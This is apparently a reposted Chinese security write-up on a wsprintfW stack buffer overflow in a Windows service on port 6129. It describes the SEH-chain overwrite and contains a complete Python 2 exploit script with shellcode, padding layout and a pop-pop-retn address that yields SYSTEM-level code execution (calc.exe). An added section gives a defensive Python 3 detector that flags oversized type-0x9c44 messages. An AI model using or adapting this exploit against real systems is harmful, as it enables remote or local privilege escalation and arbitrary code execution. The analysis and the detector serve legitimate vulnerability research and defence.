Author: SaFeBuG@i春秋

Related vulnerability link: http://www.freebuf.com/articles/terminal/102204.html

Layout of the important buffers (stack offsets):

D380: input_buf, i.e. the shellcode packet we send, size 0x430
F920: dst_buf, size 0x208
FB28: format_str, size 0x92

The key function, wsprintfW, has a maximum copy count of 0x400. Because this is the Unicode version of the function, each copied character is two bytes; the loop copies 0x400 times, so 0x800 bytes are written in total. Writing 0x800 bytes downwards from F920 overwrites the whole stack region and triggers a page-fault exception. We can therefore use this vulnerability to deliberately overwrite the head of the SEH chain: the first exception-handler address is overwritten with a pop pop retn gadget, the first exception-chain "next" pointer with eb 06 90 90, and the part that follows with our prepared call xxxx.

As shown in the figure below:

This vulnerability could only be tested locally; for remote testing, an IPv6 address must be used for it to succeed.

The IDA code segment is as follows:

This function must return non-zero; only then does the next step reach the vulnerable point.

Test environment:

Windows 7 x86. The local test EXP code is given below: local_exp.py

# Python 2 script; connects to the service on the IPv6 loopback address
import socket
import sys
import os
import time
import struct
import binascii
import random

# windows/exec - 220 bytes
# Encoder: x86/shikata_ga_nai
# VERBOSE=false, PrependMigrate=false, EXITFUNC=process,
# CMD=calc.exe

MsgBox = (
"\x31\xD2\x52\x68\x63\x61\x6C\x63\x89\xE6\x52\x56\x64"
"\x8B\x72\x30\x8B\x76\x0C\x8B\x76\x0C\xAD\x8B\x30\x8B"
"\x7E\x18\x8B\x5F\x3C\x8B\x5C\x1F\x78\x8B\x74\x1F\x20"
"\x01\xFE\x8B\x4C\x1F\x24\x01\xF9\x42\xAD\x81\x3C\x07"
"\x57\x69\x6E\x45\x75\xF5\x0F\xB7\x54\x51\xFE\x8B\x74"
"\x1F\x1C\x01\xFE\x03\x3C\x96\xFF\xD7")

#padding = "A"*(0x20b+0x9) + "B"*(0x225-0x9)
#padding = "A"*(0x20b+0x9) + sc
# Layout as described above: NOP sled + shellcode, padding, short jmp (eb 06 90 90),
# pop pop retn address, call, filler; total length is 0x430 (input_buf size)
attack = "\x90"*0x10 + MsgBox + "A"*(0x214 - 0x10 - len(MsgBox)) + "B"*(0x162) + "\xeb\x06\x90\x90" + "\x6d\x14\x40\x00" + "\xe8\x37\xd4\xfe\xff" + "D"*(0xb6-0x4-0x5)
port = 6129

#if len (sys.argv) == 2:
# (progname, host ) = sys.argv
#else:
# print len (sys.argv)
# print 'Usage: {0} host'.format (sys.argv[0])
# exit (1)
host = '0:0:0:0:0:0:0:1'
csock = socket.socket( socket.AF_INET6, socket.SOCK_STREAM)
csock.connect ( (host, int(port)) )

# 40-byte init message: version, filler, two doubles, padded with "C"
type = 444.0
buf = struct.pack("I", 4400 ) #Init Version
buf += "\xcc"*4
buf += struct.pack("d", type) #Minor Version
buf += struct.pack("d", type) #Minor Version
buf += (40 - len(buf)) * "C"
csock.send(buf)
print binascii.hexlify(csock.recv(0x4000)) #necessary reads


buf = struct.pack("I", 0x9c44) #msg type
#buf += padding #payload
buf += attack
#buf += ("%" + "\x00" + "c" + "\x00")
csock.send(buf)


print binascii.hexlify(csock.recv(0x4000))

csock.close()

A SYSTEM-level calc.
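As an added, defender-oriented example (not part of the original post and not the exploit above), the following Python 3 snippet parses the client side of the exchange exactly as the script sends it (the 40-byte init message, then a 4-byte message type followed by the payload) and flags a type-0x9c44 message whose payload is larger than the 0x208-byte dst_buf, which is the condition the write-up describes. It assumes that each captured TCP send is one message, because the page shows no length field; the sample session is constructed, and the message type 0x1234 is a placeholder standing in for "some other type".

```python
import struct

# Sizes and constants taken from the write-up's stack layout and script
INPUT_BUF_SIZE = 0x430      # input_buf: the received packet buffer
DST_BUF_SIZE = 0x208        # dst_buf: the wsprintfW destination that overflows
WSPRINTF_MAX_CHARS = 0x400  # wsprintfW copies at most 0x400 wide characters
VULN_MSG_TYPE = 0x9c44      # message type that reaches the vulnerable path
INIT_MSG_LEN = 40           # the fixed-size initial message


def parse_init(msg):
    """Parse the 40-byte init message: uint32 version, 4 filler bytes, two doubles."""
    if len(msg) != INIT_MSG_LEN:
        raise ValueError("init message must be %d bytes, got %d" % (INIT_MSG_LEN, len(msg)))
    (version,) = struct.unpack_from("<I", msg, 0)
    major, minor = struct.unpack_from("<dd", msg, 8)
    return {"version": version, "major": major, "minor": minor}


def parse_message(msg):
    """Split a client message into its 4-byte type and the remaining payload."""
    if len(msg) < 4:
        raise ValueError("message shorter than the 4-byte type field")
    (mtype,) = struct.unpack_from("<I", msg, 0)
    return mtype, msg[4:]


def max_overflow_bytes():
    """Bytes wsprintfW can write past the end of dst_buf: 0x400 chars * 2 - 0x208."""
    return WSPRINTF_MAX_CHARS * 2 - DST_BUF_SIZE


def check_message(msg):
    """Return a finding for a type-0x9c44 message whose payload exceeds dst_buf, else None."""
    mtype, payload = parse_message(msg)
    if mtype != VULN_MSG_TYPE or len(payload) <= DST_BUF_SIZE:
        return None
    return {
        "type": mtype,
        "payload_len": len(payload),
        "limit": DST_BUF_SIZE,
        "excess": len(payload) - DST_BUF_SIZE,
    }


def scan_session(messages):
    """Scan the client half of one session: the init message first, then typed messages.

    Assumption: each element of `messages` is one TCP send, as in the write-up's script.
    """
    if not messages:
        return {"init": None, "findings": []}
    init = parse_init(messages[0])
    findings = []
    for index, msg in enumerate(messages[1:], start=1):
        finding = check_message(msg)
        if finding is not None:
            finding["index"] = index
            findings.append(finding)
    return {"init": init, "findings": findings}


# Constructed sample session (not a real capture). The init message mirrors the
# write-up's handshake values; the payloads are plain filler bytes, not shellcode.
SAMPLE_INIT = struct.pack("<I", 4400) + b"\xcc" * 4 + struct.pack("<dd", 444.0, 444.0)
SAMPLE_INIT += b"C" * (INIT_MSG_LEN - len(SAMPLE_INIT))
SAMPLE_SMALL = struct.pack("<I", VULN_MSG_TYPE) + b"A" * 0x100          # fits in dst_buf
SAMPLE_OTHER = struct.pack("<I", 0x1234) + b"A" * INPUT_BUF_SIZE         # placeholder type, ignored
SAMPLE_LARGE = struct.pack("<I", VULN_MSG_TYPE) + b"A" * INPUT_BUF_SIZE  # input_buf-sized payload

if __name__ == "__main__":
    result = scan_session([SAMPLE_INIT, SAMPLE_SMALL, SAMPLE_OTHER, SAMPLE_LARGE])
    print("init:", result["init"])
    print("wsprintfW can write at most %d bytes past dst_buf" % max_overflow_bytes())
    for f in result["findings"]:
        print("message %d: type 0x%x payload %d bytes exceeds dst_buf (0x%x) by %d"
              % (f["index"], f["type"], f["payload_len"], f["limit"], f["excess"]))
```

The check is deliberately a length threshold on the one message type the write-up ties to the vulnerable path, so it is cheap to run over captured traffic to port 6129; it says nothing about messages of other types or about payloads at or below 0x208 bytes.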

Original article: http://bbs.ichunqiu.com/thread-13555-1-1.html?from=seebug


This article was published by Seebug Paper; please credit the source when reprinting. Article URL: http://www.bjnorthway.com/82/